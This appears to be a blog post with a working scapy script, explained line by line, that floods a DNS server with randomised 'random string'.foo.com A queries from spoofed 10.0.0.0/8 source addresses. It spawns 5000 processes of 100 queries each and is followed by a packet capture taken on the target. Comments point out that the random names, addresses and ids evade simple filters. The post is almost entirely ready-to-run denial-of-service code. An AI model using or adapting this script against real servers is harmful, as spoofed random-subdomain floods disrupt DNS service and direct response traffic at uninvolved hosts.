lost and found ( for me ? )

scapy 2.2.0 dev: craft “random string”.foo.com A EDNS0 queries

Here is a sample script that crafts A queries for “random string”.foo.com, each carrying an EDNS0 OPT record and a spoofed source IP address.

# cat -n send_random_A_EDNS0_query.py
    1  #!/usr/bin/env python
    2  # -*- coding: utf-8 -*-
    3
    4  ###
    5  # this script is for 2.2.0-dev
    6  # this script can generate crafted EDNS0 "random string".foo.com A queries with spoofed IP addresses
    7  # tested with Python 2.7.4
    8  ###
    9
   10  import multiprocessing
   11  import logging
   12  logging.getLogger("scapy.runtime").setLevel(logging.ERROR)  # raise the "scapy.runtime" logger to ERROR before scapy.all is imported on line 14
   13
   14  from scapy.all import *
   15  import random
   16  import string
   17  import time
   18
   19  domain_string = string.ascii_lowercase + string.digits  # alphabet for the random labels: a-z and 0-9
   20  target_server = "192.168.10.11"  # destination address of every query; the capture further down was taken on this server
   21  interface_name = "br0"  # interface name handed to send() as iface
   22
   23  def craft_DNS():
               # Send 100 DNS queries to target_server, one send() call per query.
               # Each query asks for the A record of a fresh name of the form
               # <10 random chars>.<3 random chars>.foo.com, with the characters
               # drawn from domain_string.
               #
               # NOTE(review): seen from the receiving server, the constant parts
               # of this traffic are the foo.com suffix, the 10- and 3-character
               # label lengths, qtype A / class IN, the RD bit and the OPT record.
               # The query name, source address, source port and DNS id differ on
               # every packet, so a filter keyed on one of those values alone will
               # not match the next packet.
   24          for j in range(0,100):
   25                  a1 = ''.join(random.choice(domain_string) for x in range(10))
   26                  b1 = ''.join(random.choice(domain_string) for y in range(3))
   27                  target1 = a1 + "." + b1 + "." + "foo.com"
   28
                       # IP layer: the source is a RandIP value from 10.0.0.0/8 (not this
                       # host's address), the destination is target_server.
                       # UDP layer: RandShort source port, destination port 53.
                       # DNS layer: RD set, RandShort id, one question (target1, A, IN) and
                       # one OPT record in the additional section; in an OPT record the
                       # class field carries the advertised EDNS0 UDP payload size, here 4096.
                       # send() is called with verbose=False, iface=interface_name and loop=0.
   29                  send(IP(src=RandIP("10.0.0.0/8"), dst="%s" % target_server)/UDP(sport=RandShort(),dport=53)/DNS(rd=1L,id=RandShort(),qd=DNSQR(qname="%s" % target1, qtype="A", qclass="IN"), ar=DNSRROPT(rclass=4096)),verbose=False,iface="%s" % interface_name,loop=0)
   30
   31  if __name__ == '__main__':
               # Start 5000 worker processes, each running craft_DNS() (100 queries
               # per worker). The Process objects are collected in jobs, but nothing
               # here joins them or limits how many run at the same time.
   32          jobs = []
   33          for i in range(5000):
   34                  p = multiprocessing.Process(target=craft_DNS)
   35                  jobs.append(p)
   36                  p.start()
               # This line sits after the loop, so terminate() is called only on the
               # last Process created; the other workers are neither terminated nor
               # waited for here.
   37          p.terminate()

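Capture data collected on the target DNS server. The queries arrive from spoofed 10.0.0.0/8 source addresses, each for a different random name under foo.com, and the server's responses go out to those spoofed addresses.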
76 0.005761000 192.168.10.11 -> 10.36.88.148 DNS 93 Standard query response 0x4150
82 0.005962000  10.78.195.9 -> 192.168.10.11 DNS 93 Standard query 0x6e9d  A opfolq0new.h16.foo.com
84 0.006078000 192.168.10.11 -> 10.55.142.81 DNS 93 Standard query response 0xb67f
88 0.006358000 192.168.10.11 -> 10.187.137.156 DNS 93 Standard query response 0xd697
90 0.006590000 192.168.10.11 -> 10.169.60.242 DNS 93 Standard query response 0x0905
92 0.006840000 192.168.10.11 -> 10.110.137.121 DNS 93 Standard query response 0xa51f
94 0.006964000  10.65.14.73 -> 192.168.10.11 DNS 93 Standard query 0x3563  A 1ra08c4vts.kpw.foo.com
95 0.007080000 192.168.10.11 -> 10.237.130.164 DNS 93 Standard query response 0x22c7
97 0.007207000 10.102.218.191 -> 192.168.10.11 DNS 93 Standard query 0x1d18  A xqwtjpqi8f.yar.foo.com
98 0.007221000 10.71.23.177 -> 192.168.10.11 DNS 93 Standard query 0x1655  A rd4su27neq.r66.foo.com



 
